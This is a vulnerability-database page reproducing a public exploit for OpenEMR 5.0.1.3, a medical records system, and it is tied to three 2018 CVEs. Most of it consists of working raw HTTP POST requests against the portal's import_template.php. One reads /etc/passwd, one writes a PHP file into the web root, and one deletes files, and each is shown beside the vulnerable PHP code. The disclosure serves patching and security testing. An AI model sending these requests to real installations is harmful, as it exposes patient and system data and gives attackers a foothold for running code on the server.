Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

OpenEMR 5.0.1.3 File Read / Write / Delete

Related Vulnerabilities: CVE-2018-15142   CVE-2018-15141   CVE-2018-15140  
Publish Date: 16 Aug 2018
Author: Joshua Fam
Source 
                # Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions  
# Date: 2018-08-14
# Exploit Author: Joshua Fam
# Twitter : @Insecurity
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Version: < 5.0.1.3 
# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
# CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140
 
# 1.Arbitrary File Read:
# In OpenEmr a user that has access to the portal can send a malcious 
# POST request to read arbitrary files.
 
# i.Vulnerable Code:     
#  if ($_POST['mode'] == 'get') {
#    echo file_get_contents($_POST['docid']);
#    exit;
#  }
 
# ii. Proof of Concept:
POST /openemr/portal/import_template.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101        Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
 
mode=get&docid=/etc/passwd
 
# 2.Arbitrary File Write:
# In OpenEmr a user that has access to the portal can send a malcious 
# POST request to write arbitrary files.
  
#  i. Vulnerable Code:     
#    } else if ($_POST['mode'] == 'save') {
#        file_put_contents($_POST['docid'], $_POST['content']);
#        exit(true);
#    }
   
#  ii. Proof of Concept:
POST /openemr/portal/import_template.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
 
mode=save&docid=payload.php&content=<?php phpinfo();?>
 
# After sending this navigate to payload.php at http://hostname/openemr/portal
 
# 3. Arbitrary File Delete:
# In OpenEmr a user that has access to the portal can send a malcious 
# POST request to delete a arbitrary file.
   
#  i. Vulnerable Code:      
#     } else if ($_POST['mode'] == 'delete') {
#       unlink($_POST['docid']);
#       exit(true);
#     }
   
#  ii. Proof of Concept:     
POST /openemr/portal/import_template.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
 
mode=delete&docid=payload.php
        
# After completing this request, when you navigate to payload.php, you should be greeted by a 404 page.

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started